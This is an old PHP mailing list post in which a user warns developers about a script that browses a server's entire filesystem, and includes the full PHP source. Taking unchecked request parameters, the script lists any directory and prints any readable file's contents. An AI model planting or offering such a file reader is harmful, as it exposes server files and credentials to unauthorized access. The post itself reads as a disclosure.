Hi. I found something that is really dangerous. I hope there is a
configuration variable on php.ini that denies what this script do, but
if not, PHP Developers must find a way to stop this. THe following code
allows someone to browse the entire directory three of a server.
Here is the code:
<?
$url="1.php";
if(!isset($file) && !isset($dir))$dir="/";
if(isset($dir)){
diretorio($dir);
}
if(isset($file)){
arquivo($file);
}
function diretorio($dir){
global $url;
echo "<b>$dir</b><br>";
$files=array();
$i=0;
$handle = @opendir($dir);
while ($file = @readdir($handle)) {
$files[$i++]=$file;
}
@closedir($handle);
for($refer=0;$refer < count($files);$refer++)
{
if(@is_dir("$dir/$files[$refer]")){
if($files[$refer] == ".."){
echo "<a
href=\"Javascript:history.back()\">[dir]...<b>$files[$refer]</b></a><br>";
}
else{
echo "<a
href=\"$url?dir=$dir/$files[$refer]\">[dir] <b>$files[$refer]</
b></a><br>";
}
}
else{
echo "<a
href=\"$url?file=$dir/$files[$refer]\">
; $files[$refer]</a><br>";
}
}
}
function arquivo($file){
echo "<a href=\"Javascript:history.back()\"><b>Voltar <<</b></a><br>";
$logfile = fopen ( "$file", "r");
$text = fread($logfile,filesize($file));
$text= ereg_replace("\n", "<br>", $text);
echo "$text";
}
?>
--
PHP Install Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
